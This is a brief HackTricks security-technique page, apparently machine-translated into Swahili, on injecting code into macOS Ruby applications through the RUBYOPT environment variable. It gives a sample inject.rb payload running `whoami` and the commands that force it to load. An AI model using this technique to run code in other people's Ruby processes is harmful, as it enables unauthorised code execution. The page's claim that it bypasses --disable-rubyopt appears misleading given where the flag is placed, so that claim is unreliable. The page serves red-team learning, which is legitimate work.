HackTricksmacOS Ruby Applications Injection
Reading time: 2 minutes
tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
RUBYOPT
Kwa kutumia hii env variable inawezekana kuongeza params mpya kwa ruby kila wakati inatekelezwa. Ingawa param -e haiwezi kutumika kubaini msimbo wa ruby wa kutekeleza, inawezekana kutumia params -I na -r kuongeza folda mpya kwenye maktaba za kupakia na kisha kubaini maktaba ya kupakia.
Unda maktaba inject.rb katika /tmp:
puts `whoami`
Tengeneza popote script ya ruby kama:
puts 'Hello, World!'
Kisha fanya script ya ruby isiyo na mpangilio iipakue na:
RUBYOPT="-I/tmp -rinject" ruby hello.rb
Fahamu ya kufurahisha, inafanya kazi hata na param --disable-rubyopt:
RUBYOPT="-I/tmp -rinject" ruby hello.rb --disable-rubyopt
tip
Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.